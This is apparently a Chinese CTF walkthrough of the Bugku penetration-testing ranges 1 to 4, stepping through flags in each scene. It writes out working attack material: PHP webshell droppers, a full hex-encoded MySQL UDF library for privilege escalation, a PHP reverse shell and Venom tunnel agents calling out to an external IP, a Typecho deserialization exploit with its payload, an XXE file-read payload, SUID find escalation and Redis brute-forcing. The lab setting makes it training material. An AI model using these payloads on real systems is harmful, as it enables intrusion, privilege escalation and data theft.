渗透测试1

开题http://101.133.129.4:80

image-20250218125948526

场景1

查看网页源代码发现flag,并发现下一个flag的提示

image-20250218130041254

场景2

扫描发现/admin

image-20250218130709303

进行弱口令爆破发现账号密码为admin:admin,登录成功

image-20250218130817705

找到第二个flag以及下一个提示

image-20250218131042818

场景3

添加可以上传php文件

image-20250218131407513

发现可以在线执行代码

image-20250218131830032

进行写文件

<?php fputs(fopen('shell.php','w'),'<?php eval($_POST[1]);phpinfo();?>')?>

image-20250218132056989

蚁剑连接,找到flag

image-20250218132049072

场景4

找到数据库配置文件app/database.php

image-20250218132311433

连接数据库 localhost改为127.0.0.1

image-20250218132929237

找到flag

image-20250218133105622

场景5

题目处有提示但是不会pwn,这里用的udf提权

image-20250218133234014

查看一下版本吧

image-20250218133629241

image-20250218134028810

插件位置

image-20250218134053342

发现可以mysql udf提权MySQL UDF 提权十六进制查询 | 国光

SELECT 0x7f454c4602010100000000000000000003003e0001000000d00c0000000000004000000000000000e8180000000000000000000040003800050040001a00190001000000050000000000000000000000000000000000000000000000000000001415000000000000141500000000000000002000000000000100000006000000181500000000000018152000000000001815200000000000700200000000000080020000000000000000200000000000020000000600000040150000000000004015200000000000401520000000000090010000000000009001000000000000080000000000000050e57464040000006412000000000000641200000000000064120000000000009c000000000000009c00000000000000040000000000000051e5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000250000002b0000001500000005000000280000001e000000000000000000000006000000000000000c00000000000000070000002a00000009000000210000000000000000000000270000000b0000002200000018000000240000000e00000000000000040000001d0000001600000000000000130000000000000000000000120000002300000010000000250000001a0000000f000000000000000000000000000000000000001b00000000000000030000000000000000000000000000000000000000000000000000002900000014000000000000001900000020000000000000000a00000011000000000000000000000000000000000000000d0000002600000017000000000000000800000000000000000000000000000000000000000000001f0000001c0000000000000000000000000000000000000000000000020000000000000011000000140000000200000007000000800803499119c4c93da4400398046883140000001600000017000000190000001b0000001d0000002000000022000000000000002300000000000000240000002500000027000000290000002a00000000000000ce2cc0ba673c7690ebd3ef0e78722788b98df10ed871581cc1e2f7dea868be12bbe3927c7e8b92cd1e7066a9c3f9bfba745bb073371974ec4345d5ecc5a62c1cc3138aff36ac68ae3b9fd4a0ac73d1c525681b320b5911feab5fbe120000000000000000000000000000000000000000000000000000000003000900a00b0000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000e0000000120000000000000000000000de01000000000000790100001200000000000000000000007700000000000000ba0000001200000000000000000000003504000000000000f5000000120000000000000000000000c2010000000000009e010000120000000000000000000000d900000000000000fb000000120000000000000000000000050000000000000016000000220000000000000000000000fe00000000000000cf000000120000000000000000000000ad00000000000000880100001200000000000000000000008000000000000000ab010000120000000000000000000000250100000000000010010000120000000000000000000000dc00000000000000c7000000120000000000000000000000c200000000000000b5000000120000000000000000000000cc02000000000000ed000000120000000000000000000000e802000000000000e70000001200000000000000000000009b00000000000000c200000012000000000000000000000028000000000000008001000012000b007a100000000000006e000000000000007500000012000b00a70d00000000000001000000000000001000000012000c00781100000000000000000000000000003f01000012000b001a100000000000002d000000000000001f01000012000900a00b0000000000000000000000000000c30100001000f1ff881720000000000000000000000000009600000012000b00ab0d00000000000001000000000000007001000012000b0066100000000000001400000000000000cf0100001000f1ff981720000000000000000000000000005600000012000b00a50d00000000000001000000000000000201000012000b002e0f0000000000002900000000000000a301000012000b00f71000000000000041000000000000003900000012000b00a40d00000000000001000000000000003201000012000b00ea0f0000000000003000000000000000bc0100001000f1ff881720000000000000000000000000006500000012000b00a60d00000000000001000000000000002501000012000b00800f0000000000006a000000000000008500000012000b00a80d00000000000003000000000000001701000012000b00570f00000000000029000000000000005501000012000b0047100000000000001f00000000000000a900000012000b00ac0d0000000000009a000000000000008f01000012000b00e8100000000000000f00000000000000d700000012000b00460e000000000000e800000000000000005f5f676d6f6e5f73746172745f5f005f66696e69005f5f6378615f66696e616c697a65005f4a765f5265676973746572436c6173736573006c69625f6d7973716c7564665f7379735f696e666f5f6465696e6974007379735f6765745f6465696e6974007379735f657865635f6465696e6974007379735f6576616c5f6465696e6974007379735f62696e6576616c5f696e6974007379735f62696e6576616c5f6465696e6974007379735f62696e6576616c00666f726b00737973636f6e66006d6d6170007374726e6370790077616974706964007379735f6576616c006d616c6c6f6300706f70656e007265616c6c6f630066676574730070636c6f7365007379735f6576616c5f696e697400737472637079007379735f657865635f696e6974007379735f7365745f696e6974007379735f6765745f696e6974006c69625f6d7973716c7564665f7379735f696e666f006c69625f6d7973716c7564665f7379735f696e666f5f696e6974007379735f657865630073797374656d007379735f73657400736574656e76007379735f7365745f6465696e69740066726565007379735f67657400676574656e76006c6962632e736f2e36005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e322e35000000000000000000020002000200020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001000100000001000100b20100001000000000000000751a690900000200d401000000000000801720000000000008000000000000008017200000000000d01620000000000006000000020000000000000000000000d81620000000000006000000030000000000000000000000e016200000000000060000000a00000000000000000000000017200000000000070000000400000000000000000000000817200000000000070000000500000000000000000000001017200000000000070000000600000000000000000000001817200000000000070000000700000000000000000000002017200000000000070000000800000000000000000000002817200000000000070000000900000000000000000000003017200000000000070000000a00000000000000000000003817200000000000070000000b00000000000000000000004017200000000000070000000c00000000000000000000004817200000000000070000000d00000000000000000000005017200000000000070000000e00000000000000000000005817200000000000070000000f00000000000000000000006017200000000000070000001000000000000000000000006817200000000000070000001100000000000000000000007017200000000000070000001200000000000000000000007817200000000000070000001300000000000000000000004883ec08e827010000e8c2010000e88d0500004883c408c3ff35320b2000ff25340b20000f1f4000ff25320b20006800000000e9e0ffffffff252a0b20006801000000e9d0ffffffff25220b20006802000000e9c0ffffffff251a0b20006803000000e9b0ffffffff25120b20006804000000e9a0ffffffff250a0b20006805000000e990ffffffff25020b20006806000000e980ffffffff25fa0a20006807000000e970ffffffff25f20a20006808000000e960ffffffff25ea0a20006809000000e950ffffffff25e20a2000680a000000e940ffffffff25da0a2000680b000000e930ffffffff25d20a2000680c000000e920ffffffff25ca0a2000680d000000e910ffffffff25c20a2000680e000000e900ffffffff25ba0a2000680f000000e9f0feffff00000000000000004883ec08488b05f50920004885c07402ffd04883c408c390909090909090909055803d900a2000004889e5415453756248833dd809200000740c488b3d6f0a2000e812ffffff488d05130820004c8d2504082000488b15650a20004c29e048c1f803488d58ff4839da73200f1f440000488d4201488905450a200041ff14c4488b153a0a20004839da72e5c605260a2000015b415cc9c3660f1f8400000000005548833dbf072000004889e57422488b05530920004885c07416488d3da70720004989c3c941ffe30f1f840000000000c9c39090c3c3c3c331c0c3c341544883c9ff4989f455534883ec10488b4610488b3831c0f2ae48f7d1488d69ffe8b6feffff83f80089c77c61754fbf1e000000e803feffff488d70ff4531c94531c031ffb921000000ba07000000488d042e48f7d64821c6e8aefeffff4883f8ff4889c37427498b4424104889ea4889df488b30e852feffffffd3eb0cba0100000031f6e802feffff31c0eb05b8010000005a595b5d415cc34157bf00040000415641554531ed415455534889f34883ec1848894c24104c89442408e85afdffffbf010000004989c6e84dfdffffc600004889c5488b4310488d356a030000488b38e814feffff4989c7eb374c89f731c04883c9fff2ae4889ef48f7d1488d59ff4d8d641d004c89e6e8ddfdffff4a8d3c284889da4c89f64d89e54889c5e8a8fdffff4c89fabe080000004c89f7e818fdffff4885c075b44c89ffe82bfdffff807d0000750a488b442408c60001eb1f42c6442dff0031c04883c9ff4889eff2ae488b44241048f7d148ffc94889084883c4184889e85b5d415c415d415e415fc34883ec08833e014889d7750b488b460831d2833800740e488d353a020000e817fdffffb20188d05ec34883ec08833e014889d7750b488b460831d2833800740e488d3511020000e8eefcffffb20188d05fc3554889fd534889d34883ec08833e027409488d3519020000eb3f488b46088338007409488d3526020000eb2dc7400400000000488b4618488b384883c70248037808e801fcffff31d24885c0488945107511488d351f0200004889dfe887fcffffb20141585b88d05dc34883ec08833e014889f94889d77510488b46088338007507c6010131c0eb0e488d3576010000e853fcffffb0014159c34154488d35ef0100004989cc4889d7534889d34883ec08e832fcffff49c704241e0000004889d8415a5b415cc34883ec0831c0833e004889d7740e488d35d5010000e807fcffffb001415bc34883ec08488b4610488b38e862fbffff5a4898c34883ec28488b46184c8b4f104989f2488b08488b46104c89cf488b004d8d4409014889c6f3a44c89c7498b4218488b0041c6040100498b4210498b5218488b4008488b4a08ba010000004889c6f3a44c89c64c89cf498b4218488b400841c6040000e867fbffff4883c4284898c3488b7f104885ff7405e912fbffffc3554889cd534c89c34883ec08488b4610488b38e849fbffff4885c04889c27505c60301eb1531c04883c9ff4889d7f2ae48f7d148ffc948894d00595b4889d05dc39090909090909090554889e5534883ec08488b05c80320004883f8ff7419488d1dbb0320000f1f004883eb08ffd0488b034883f8ff75f14883c4085bc9c390904883ec08e86ffbffff4883c408c345787065637465642065786163746c79206f6e6520737472696e67207479706520706172616d657465720045787065637465642065786163746c792074776f20617267756d656e747300457870656374656420737472696e67207479706520666f72206e616d6520706172616d6574657200436f756c64206e6f7420616c6c6f63617465206d656d6f7279006c69625f6d7973716c7564665f7379732076657273696f6e20302e302e34004e6f20617267756d656e747320616c6c6f77656420287564663a206c69625f6d7973716c7564665f7379735f696e666f290000011b033b980000001200000040fbffffb400000041fbffffcc00000042fbffffe400000043fbfffffc00000044fbffff1401000047fbffff2c01000048fbffff44010000e2fbffff6c010000cafcffffa4010000f3fcffffbc0100001cfdffffd401000086fdfffff4010000b6fdffff0c020000e3fdffff2c02000002feffff4402000016feffff5c02000084feffff7402000093feffff8c0200001400000000000000017a5200017810011b0c070890010000140000001c00000084faffff01000000000000000000000014000000340000006dfaffff010000000000000000000000140000004c00000056faffff01000000000000000000000014000000640000003ffaffff010000000000000000000000140000007c00000028faffff030000000000000000000000140000009400000013faffff01000000000000000000000024000000ac000000fcf9ffff9a00000000420e108c02480e18410e20440e3083048603000000000034000000d40000006efaffffe800000000420e10470e18420e208d048e038f02450e28410e30410e38830786068c05470e50000000000000140000000c0100001efbffff2900000000440e100000000014000000240100002ffbffff2900000000440e10000000001c0000003c01000040fbffff6a00000000410e108602440e188303470e200000140000005c0100008afbffff3000000000440e10000000001c00000074010000a2fbffff2d00000000420e108c024e0e188303470e2000001400000094010000affbffff1f00000000440e100000000014000000ac010000b6fbffff1400000000440e100000000014000000c4010000b2fbffff6e00000000440e300000000014000000dc01000008fcffff0f00000000000000000000001c000000f4010000fffbffff4100000000410e108602440e188303470e2000000000000000000000ffffffffffffffff0000000000000000ffffffffffffffff000000000000000000000000000000000100000000000000b2010000000000000c00000000000000a00b0000000000000d00000000000000781100000000000004000000000000005801000000000000f5feff6f00000000a00200000000000005000000000000006807000000000000060000000000000060030000000000000a00000000000000e0010000000000000b0000000000000018000000000000000300000000000000e81620000000000002000000000000008001000000000000140000000000000007000000000000001700000000000000200a0000000000000700000000000000c0090000000000000800000000000000600000000000000009000000000000001800000000000000feffff6f00000000a009000000000000ffffff6f000000000100000000000000f0ffff6f000000004809000000000000f9ffff6f0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000401520000000000000000000000000000000000000000000ce0b000000000000de0b000000000000ee0b000000000000fe0b0000000000000e0c0000000000001e0c0000000000002e0c0000000000003e0c0000000000004e0c0000000000005e0c0000000000006e0c0000000000007e0c0000000000008e0c0000000000009e0c000000000000ae0c000000000000be0c0000000000008017200000000000004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200002e7368737472746162002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c612e64796e002e72656c612e706c74002e696e6974002e74657874002e66696e69002e726f64617461002e65685f6672616d655f686472002e65685f6672616d65002e63746f7273002e64746f7273002e6a6372002e64796e616d6963002e676f74002e676f742e706c74002e64617461002e627373002e636f6d6d656e7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0000000500000002000000000000005801000000000000580100000000000048010000000000000300000000000000080000000000000004000000000000000b000000f6ffff6f0200000000000000a002000000000000a002000000000000c000000000000000030000000000000008000000000000000000000000000000150000000b00000002000000000000006003000000000000600300000000000008040000000000000400000002000000080000000000000018000000000000001d00000003000000020000000000000068070000000000006807000000000000e00100000000000000000000000000000100000000000000000000000000000025000000ffffff6f020000000000000048090000000000004809000000000000560000000000000003000000000000000200000000000000020000000000000032000000feffff6f0200000000000000a009000000000000a009000000000000200000000000000004000000010000000800000000000000000000000000000041000000040000000200000000000000c009000000000000c00900000000000060000000000000000300000000000000080000000000000018000000000000004b000000040000000200000000000000200a000000000000200a0000000000008001000000000000030000000a0000000800000000000000180000000000000055000000010000000600000000000000a00b000000000000a00b000000000000180000000000000000000000000000000400000000000000000000000000000050000000010000000600000000000000b80b000000000000b80b00000000000010010000000000000000000000000000040000000000000010000000000000005b000000010000000600000000000000d00c000000000000d00c000000000000a80400000000000000000000000000001000000000000000000000000000000061000000010000000600000000000000781100000000000078110000000000000e000000000000000000000000000000040000000000000000000000000000006700000001000000320000000000000086110000000000008611000000000000dd000000000000000000000000000000010000000000000001000000000000006f000000010000000200000000000000641200000000000064120000000000009c000000000000000000000000000000040000000000000000000000000000007d000000010000000200000000000000001300000000000000130000000000001402000000000000000000000000000008000000000000000000000000000000870000000100000003000000000000001815200000000000181500000000000010000000000000000000000000000000080000000000000000000000000000008e000000010000000300000000000000281520000000000028150000000000001000000000000000000000000000000008000000000000000000000000000000950000000100000003000000000000003815200000000000381500000000000008000000000000000000000000000000080000000000000000000000000000009a000000060000000300000000000000401520000000000040150000000000009001000000000000040000000000000008000000000000001000000000000000a3000000010000000300000000000000d016200000000000d0160000000000001800000000000000000000000000000008000000000000000800000000000000a8000000010000000300000000000000e816200000000000e8160000000000009800000000000000000000000000000008000000000000000800000000000000b1000000010000000300000000000000801720000000000080170000000000000800000000000000000000000000000008000000000000000000000000000000b7000000080000000300000000000000881720000000000088170000000000001000000000000000000000000000000008000000000000000000000000000000bc000000010000000000000000000000000000000000000088170000000000009b000000000000000000000000000000010000000000000000000000000000000100000003000000000000000000000000000000000000002318000000000000c500000000000000000000000000000001000000000000000000000000000000 INTO DUMPFILE '/usr/lib/x86_64-linux-gnu/mariadb18/plugin/udf.so';

image-20250218134419402

然后引用文件镜像

CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';

image-20250218134526706

成功提权

image-20250218134604005

拿到第五段flag和提示的8080端口

image-20250218135214532

场景6

访问8080端口还是一个登录框

image-20250218135425078

image-20250218135510277

发现robots.txt拿到flag

image-20250218140517824

场景7

尝试用弱口令登陆抓包

image-20250218135818744

发现经典字段

Set-Cookie: rememberMe=deleteMe;

确定为shiro框架,直接拿出工具

image-20250218140053333

查找flag

image-20250218140152882

发现/root/flag读取不到,只能读到/home/flag

场景8

image-20250218140833264

尝试进行find提权

find / -perm -4000 -type f 2>/dev/null 
find flag -exec whoami \;
  • find flag:在当前目录下查找名为 flag 的文件或目录。
  • -exec whoami \;:对每个找到的文件或目录执行 whoami 命令。
  • whoami:显示当前用户的用户名。
  • \;:表示 -exec 命令的结束。

image-20250218141204946

拿到flag,并且提示内网

场景9

image-20250218141831460

上传fscan,venom

扫一下

./fscan -h 192.168.0.2/24

蚁剑是属于虚拟终端,看不到回显

cat result.txt

[+] 端口开放 192.168.0.4:80
[+] 端口开放 192.168.0.2:80
[+] 端口开放 192.168.0.1:80
[+] 端口开放 192.168.0.1:22
[+] 端口开放 192.168.0.4:3306
[+] 端口开放 192.168.0.3:8080
[+] 端口开放 192.168.0.1:8080
[+] 端口开放 192.168.0.2:9999
[+] 端口开放 192.168.0.1:9999
[*] 网站标题 http://192.168.0.4        状态码:200 长度:8351   标题:博客首页
[*] 网站标题 http://192.168.0.1:8080   状态码:302 长度:0      标题:无标题 重定向地址: http://192.168.0.1:8080/login;jsessionid=C2F897E86587DFF88D23E0B904BEE5F1
[*] 网站标题 http://192.168.0.3:8080   状态码:302 长度:0      标题:无标题 重定向地址: http://192.168.0.3:8080/login;jsessionid=E38D96AE83415803DBF186137E09B661
[*] 网站标题 http://192.168.0.3:8080/login;jsessionid=E38D96AE83415803DBF186137E09B661 状态码:200 长度:2608   标题:Login Page
[*] 网站标题 http://192.168.0.1:8080/login;jsessionid=C2F897E86587DFF88D23E0B904BEE5F1 状态码:200 长度:2608   标题:Login Page
[*] 网站标题 http://192.168.0.1        状态码:200 长度:59431  标题:W3School教程系统 | 打造专一的web在线教程系统
[*] 网站标题 http://192.168.0.2        状态码:200 长度:59431  标题:W3School教程系统 | 打造专一的web在线教程系统
[+] 端口开放 192.168.0.1:8080
[+] 端口开放 192.168.0.3:8080
[+] 端口开放 192.168.0.1:80
[+] 端口开放 192.168.0.4:80
[+] 端口开放 192.168.0.2:80
[+] 端口开放 192.168.0.1:22
[+] 端口开放 192.168.0.4:3306
[+] 端口开放 192.168.0.1:9999
[+] 端口开放 192.168.0.2:9999
[*] 网站标题 http://192.168.0.3:8080   状态码:302 长度:0      标题:无标题 重定向地址: http://192.168.0.3:8080/login;jsessionid=6E003D41C5A343B93B3512EE11C3AB2D
[*] 网站标题 http://192.168.0.3:8080/login;jsessionid=6E003D41C5A343B93B3512EE11C3AB2D 状态码:200 长度:2608   标题:Login Page
[*] 网站标题 http://192.168.0.1:8080   状态码:302 长度:0      标题:无标题 重定向地址: http://192.168.0.1:8080/login;jsessionid=411200418B3C1FF134349348C58EF4D8
[*] 网站标题 http://192.168.0.1:8080/login;jsessionid=411200418B3C1FF134349348C58EF4D8 状态码:200 长度:2608   标题:Login Page
[*] 网站标题 http://192.168.0.2        状态码:200 长度:59431  标题:W3School教程系统 | 打造专一的web在线教程系统
[*] 网站标题 http://192.168.0.1        状态码:200 长度:59431  标题:W3School教程系统 | 打造专一的web在线教程系统
[*] 网站标题 http://192.168.0.4        状态码:200 长度:8351   标题:博客首页
[+] 检测到漏洞 http://192.168.0.1:8080/ poc-yaml-shiro-key 参数:[{key kPH+bIxk5D2deZiIxcaaaA==} {mode cbc}]
[+] 检测到漏洞 http://192.168.0.3:8080/ poc-yaml-shiro-key 参数:[{key kPH+bIxk5D2deZiIxcaaaA==} {mode cbc}]
[+] [发现漏洞] 目标: http://192.168.0.4
  漏洞类型: poc-yaml-thinkphp5023-method-rce
  漏洞名称: poc1
  详细信息: %!s(<nil>)
[+] 端口开放 192.168.0.4:80
[+] 端口开放 192.168.0.2:80
[+] 端口开放 192.168.0.1:80
[+] 端口开放 192.168.0.1:22
[+] 端口开放 192.168.0.4:3306
[+] 端口开放 192.168.0.2:9999
[+] 端口开放 192.168.0.1:9999
[+] 端口开放 192.168.0.3:8080
[+] 端口开放 192.168.0.1:8080
[*] 网站标题 http://192.168.0.4        状态码:200 长度:8351   标题:博客首页
[*] 网站标题 http://192.168.0.1:8080   状态码:302 长度:0      标题:无标题 重定向地址: http://192.168.0.1:8080/login;jsessionid=43F761204A640C7D1244FDE0E0FC4270
[*] 网站标题 http://192.168.0.3:8080   状态码:302 长度:0      标题:无标题 重定向地址: http://192.168.0.3:8080/login;jsessionid=FBAB73CE91CDA0A018C73B8852BBA054
[*] 网站标题 http://192.168.0.3:8080/login;jsessionid=FBAB73CE91CDA0A018C73B8852BBA054 状态码:200 长度:2608   标题:Login Page
[*] 网站标题 http://192.168.0.1:8080/login;jsessionid=43F761204A640C7D1244FDE0E0FC4270 状态码:200 长度:2608   标题:Login Page
[*] 网站标题 http://192.168.0.1        状态码:200 长度:59431  标题:W3School教程系统 | 打造专一的web在线教程系统
[*] 网站标题 http://192.168.0.2        状态码:200 长度:59431  标题:W3School教程系统 | 打造专一的web在线教程系统
[+] [发现漏洞] 目标: http://192.168.0.4
  漏洞类型: poc-yaml-thinkphp5023-method-rce
  漏洞名称: poc1
  详细信息: %!s(<nil>)
[+] 检测到漏洞 http://192.168.0.1:8080/ poc-yaml-shiro-key 参数:[{key kPH+bIxk5D2deZiIxcaaaA==} {mode cbc}]
[+] 检测到漏洞 http://192.168.0.3:8080/ poc-yaml-shiro-key 参数:[{key kPH+bIxk5D2deZiIxcaaaA==} {mode cbc}]

运用php文件反弹shell

<?php
$ip='8.134.149.24';
$port='2333';
$sock = fsockopen($ip, $port);
$descriptorspec = array(
        0 => $sock,
        1 => $sock,
        2 => $sock
);
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);

执行php b.php

攻击机:./admin_linux_x64 -lport 9999
靶机:./agent_linux_x64 -rhost 8.134.149.24 -rport 9999

image-20250218163727625

成功访问

image-20250218151202143

先配置proxifier,然后直接用Nday打tp漏洞

image-20250218163837694

蚁剑连接拿flag和提示

image-20250218160239648

场景10

发现数据库配置

image-20250218160523491

连接数据库

image-20250218163914553

场景11

利用PwnKit提权CVE-2021-4034

image-20250218190919740

或者sudo version 1.8.31

使用sudo提权CVE-2021-3156

参考:bugkuctf渗透测试1(超详细版)_bugku 渗透测试1-CSDN博客

渗透测试2

开题:http://106.14.92.16:80

image-20250218194234242

场景1

image-20250218194247502

查看源码发现版本

image-20250218194322791

搜到Nday

<?php
class Typecho_Feed 
{ 
	const RSS1 = 'RSS 1.0'; 
	const RSS2 = 'RSS 2.0'; 
	const ATOM1 = 'ATOM 1.0'; 
	const DATE_RFC822 = 'r'; 
	const DATE_W3CDTF = 'c'; 
	const EOL = "\n"; 
	private $_type; 
	private $_items; 
	
	public function __construct(){
    $this->_type = $this::RSS2; 
    $this->_items[0] = array( 
    	'title' => '1', 
    	'link' => '1', 
    	'date' => 1508895132, 
    	'category' => array(new Typecho_Request()), 
    	'author' => new Typecho_Request(), 
    	); 
  	} 
} 
class Typecho_Request 
{ 
	private $_params = array(); 
	private $_filter = array(); 
	public function __construct(){ 
	$this->_params['screenName'] = 'fputs(fopen(\'shell.php\',\'w\'),\'<?=@eval($_REQUEST[1])?>\')';

	$this->_filter[0] = 'assert'; 
	} 
} 

$exp = array( 
	'adapter' => new Typecho_Feed(), 
	'prefix' => 'typecho_' 
); 

echo base64_encode(serialize($exp));
?>
//YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1OntzOjU6InRpdGxlIjtzOjE6IjEiO3M6NDoibGluayI7czoxOiIxIjtzOjQ6ImRhdGUiO2k6MTUwODg5NTEzMjtzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjU1OiJlY2hvICI8P3BocCBwaHBpbmZvKCk7QGV2YWwoXCRfUE9TVFsxXSk7Pz4iID4gc2hlbGwucGhwIjt9czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfZmlsdGVyIjthOjE6e2k6MDtzOjY6InN5c3RlbSI7fX19czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6NTU6ImVjaG8gIjw/cGhwIHBocGluZm8oKTtAZXZhbChcJF9QT1NUWzFdKTs/PiIgPiBzaGVsbC5waHAiO31zOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9maWx0ZXIiO2E6MTp7aTowO3M6Njoic3lzdGVtIjt9fX19fXM6NjoicHJlZml4IjtzOjg6InR5cGVjaG9fIjt9


要手动加一个referer

image-20250218195228124

image-20250218202317881

image-20250218202341541

场景2

发现配置文件

image-20250218202454788

image-20250218202550814

找到第二个flag

场景3

没提示了查看一下网卡信息

image-20250218203458663

上fscan扫一下吧

./fscan -h 192.168.0.2/24
(www-data:/tmp) $ cat r*
[+] 端口开放 192.168.0.3:80
[+] 端口开放 192.168.0.1:80
[+] 端口开放 192.168.0.2:80
[+] 端口开放 192.168.0.1:22
[+] 端口开放 192.168.0.2:3306
[*] 网站标题 http://192.168.0.2        状态码:200 长度:3392   标题:Harry's Blog
[*] 网站标题 http://192.168.0.1        状态码:200 长度:3392   标题:Harry's Blog
[+] MySQL 192.168.0.2:3306:root 
[*] 网站标题 http://192.168.0.3        状态码:200 长度:4789   标题:Bugku后台管理系统

配置代理

./admin_linux_x64 -lport 9999

./agent_linux_x64 -rhost 8.134.149.24 -rport 9999

访问192.168.0.3发现一个登录框

image-20250218204222258

登录抓包发现 /source.zip

image-20250218204521906

下载下来看看,发现是一个log4j

image-20250218204746570

image-20250219165433011

成功反弹shell

image-20250219165308113

env发现三个flag

image-20250219165715250

场景4

直接cat flag是场景四的flag

image-20250219165549781

场景5

image-20250219165713344

场景6

接着查看一下网卡信息

image-20250219165921973

发现192.168.1.2/24

wget下载fscan和venom

image-20250219171405974

vps: 
	1. python -m http.server 8000
client: 
	1. wget http://xxxxxx:8000/fscan
	2. wget http://xxxxxx:8000/agent_linux_x64

fsan扫一下,发现一个git仓库

[+] 目标 192.168.1.2     存活 (ICMP)
[+] 目标 192.168.1.1     存活 (ICMP)
[+] 目标 192.168.1.3     存活 (ICMP)
[+] ICMP存活主机数量: 3
[*] 共解析 218 个有效端口
[+] 端口开放 192.168.1.3:80
[+] 端口开放 192.168.1.1:80
[+] 端口开放 192.168.1.2:80
[+] 端口开放 192.168.1.1:22
[+] 存活端口数量: 4
[*] 开始漏洞扫描...
[*] 网站标题 http://192.168.1.2        状态码:200 长度:4789   标题:Bugku后台管理系统
[*] 网站标题 http://192.168.1.1        状态码:200 长度:3392   标题:Harry's Blog
[*] 网站标题 http://192.168.1.3        状态码:200 长度:524    标题:乙公司Git仓库

在这台机子上./agent_linux_x64 -lport 9899

image-20250219172339214

可以正常访问了

输入它提示的github网址就可以拿到flag

image-20250219172532621

场景7

这里用的别人的仓库(https://github.com/TheBeastofwar/webshell-repository.git)

只解析phtml后缀

<?php phpinfo();@eval($_POST[1]);?>

image-20250219182208776

image-20250219182419304

拿到flag

场景8

image-20250219182706606

上传一下

image-20250219183545222

./fscan -h 10.10.0.2/24
[+] 端口开放 10.10.0.1:80
[+] 端口开放 10.10.0.2:80
[+] 端口开放 10.10.0.1:22
[+] 端口开放 10.10.0.3:21
[*] 网站标题 http://10.10.0.2          状态码:200 长度:524    标题:乙公司Git仓库
[*] 网站标题 http://10.10.0.1          状态码:200 长度:3368   标题:Harry's Blog

搭好代理

靶机:./agent_linux_x64 -lport 9899

攻击机:connect 192.168.0.3 9899

image-20250219185219638

配置proxychains

[ProxyList]

socks5 8.134.149.24 9998
socks5 8.134.149.24 9997
socks5 8.134.149.24 9996

ftp登录账号密码都是guest

image-20250219184913174

一个flag在当前目录

image-20250219184940147

场景9

另一个在根目录

这里要先进入到根目录在get

image-20250219184957723

渗透测试3

开题http://101.133.129.4/

image-20250220094646799

场景1

成功读到/etc/passwd

image-20250220094615348

file:///flag读到flag

image-20250220094736118

场景2&场景3

接下来fscan扫一下

[] 最终有效主机数量: 1
[] 共解析 218 个有效端口
[+] 端口开放 101.133.129.4:22
[+] 端口开放 101.133.129.4:80
[+] 存活端口数量: 2
[] 开始漏洞扫描…
[] 网站标题 http://101.133.129.4 状态码:200 长度:1987 标题:站长之家 - 模拟蜘蛛爬取

扫描目录,也没发现预留的木马文件

利用ssrf来做一下内网探测,根据前两个靶场,地址选择192.168.0.x或192.168.1.x

发现1,2,10,138,250有结果 1,2还是这个,10是一个被黑的网站,138是一个sql查询,250是一个登录框

image-20250220100059621

192.168.0.10存在木马shell.php

image-20250220100206775

web目录一个flag

根目录一个flag

image-20250220100526916

场景4

下载好venom

image-20250220101159210

然后赋权 chmod 777 agent_linux_x64

配置venom

./admin_linux_x64 -lport 9999

./agent_linux_x64 -rhost 8.134.149.24 -rport 9999

访问192.168.0.138

image-20250220103737590

场景7&场景8

访问192.168.0.250

登录抓包可能是xxe

image-20250220104118522

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY Tsuki SYSTEM "file:///flag">
]>
 
<user><username>&Tsuki;</username><password>admin</password></user>

image-20250220104202261

web目录一个,根目录一个

场景5&场景6

image-20250220104521715

写一个脚本探测一下

import requests
for i in range(1,256):
    url = "http://10.10.0." + str(i)
    try:
        r = requests.get(url)
    except:
        continue
    else:
        if r.status_code == 200:
            print(url)

image-20250220105848765

发现还存在10.10.0.22这台机子,是一个cms

image-20250220105112984

成功利用弱口令登陆后台

image-20250220105347643

直接上传木马

image-20250220105529294

发现根目录一个flag,web目录一个flag

image-20250220105706879

image-20250220105746625

渗透测试4

开题http://139.196.35.56:80

image-20250221101810494

场景1

爆破无果,尝试更改action字段发现action字段可以rce

image-20250221101943200

尝试写马

system('echo "<?php phpinfo();eval(\$_POST[1]); ?>" > 1.php') | phpinfo

image-20250221102100610

蚁剑连接

image-20250221102231311

场景2

看一下IP信息,ifconfig被ban了,cat /etc/hosts

image-20250221102519400

上fscan扫一下,没有ping权限,使用np参数

image-20250221103043632

一个web服务一个ssh一个redis

全端口扫描,发现还有一个22000端口

image-20250221103354626

配置代理

./admin_linux_x64 -lport 9999

./agent_linux_x64 -rhost 8.134.149.24 -rport 9999

先来打redis

proxychains hydra -P passwd-top22000.txt -e ns -f -V redis://192.168.0.202

爆破得到密码为123456

image-20250221104203735

写公钥

